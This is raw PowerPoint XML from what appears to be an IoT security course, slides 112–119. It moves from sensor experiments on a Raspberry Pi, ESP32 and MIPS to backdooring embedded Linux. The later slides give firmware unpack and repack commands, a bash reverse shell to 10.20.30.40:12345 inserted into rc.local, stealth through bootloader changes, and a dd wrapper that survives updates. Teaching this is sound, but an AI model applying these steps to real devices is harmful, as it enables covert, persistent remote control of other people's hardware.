            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8710448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88" y="164235"/>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Do our sensor Arduino experiments on a Raspberry Pi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2218266"/>
            <a:ext cx="11582400" cy="4284865"/>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See the Electronics section for these.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>With PI, you can keep logs, do data analysis and transmit data over the internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87B3119-CA93-F84F-9F3A-944B0B9E3817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2815154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08" y="169440"/>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Do our sensor Arduino experiments on a ESP32 platform</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2507672"/>
            <a:ext cx="11582400" cy="399545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ESP32’s use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Xtensa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> architecture and are cheap and common.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The Arduino development environment works with them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>They often have wireless too.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FBFD127-B5E3-D241-A37D-8CE47763ED0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25591891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408" y="183296"/>
            <a:ext cx="11321024" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do our sensor Arduino experiments on a Mips platform</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2784764"/>
            <a:ext cx="11582400" cy="3718368"/>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MIPS processors are common in routers from China but not that common elsewhere.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882CC9B2-6BB0-3548-8AB4-AC19DE57AC87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1153580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830"/>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Root a raspberry pi boot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2146852"/>
            <a:ext cx="11582400" cy="435628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easiest way is to change the software on its SD card.  It’s Linux and you can do anything (backdoor logons, backdoor port for a root shell…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How can you make it stealthy by modifying either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Uboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> or the Broadcom “first code” after initialization (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bootloader.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>) which are harder to detect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEC40F54-806F-314D-827B-4BDCACA38B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1998922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89" y="623993"/>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7,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packaged attacks and surveillance</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DA190D1-CCD7-FC43-B0C6-5F516C189793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21168675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692" y="175266"/>
            <a:ext cx="10747479" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduce backdoor into embedded Linux build</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All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> distributions execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>rc.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> at boot time. Idea: add reverse shell to be executed after boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Approach for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SquashFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> firmware of a IP camera:</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Unpack firmware under Linux with: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>unsquashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>firmware.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</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Edit /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>rc.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> and add “/bin/myshell.sh” before “exit 0”</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Create a file “bin/myshell.sh” and paste the contents of the shell</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Repack the firmware with: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>mksquashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>squashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-root/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>mod_fw.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> -force-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> 1000 -force-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> 1000 -comp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while true; do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        /bin/bash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&gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/10.20.30.40/12345 0&gt;&amp;1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Done</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Disadvantage: unencrypted</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4EA3AA40-3AD1-EA4D-B35B-1C37CC0ACE81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E5DA173-5F49-CF40-B459-8A3511B4728D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8131357" y="4687250"/>
            <a:ext cx="2010487" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IoT device client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server: ncl12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1825455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38" y="94960"/>
            <a:ext cx="11846282" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Make embedded Linux backdoor persistent</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Problem: Firmware updates often overwrite the whole partition, including the backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Idea: Patch the firmware update while the update process. When firmware update uses “dd” or “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>nandwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>” to install the update, we can create a wrapper around it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Approach:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Rename “/bin/dd” to “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ddd</a:t>
            </a:r>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Create a shell script with the name “/bin/dd” and make it executable by “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> +x”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>See example for such wrapper on the next slide</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E265817B-7399-BD47-B06C-4959E35DDA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>119</a:t>
            </a:fld>
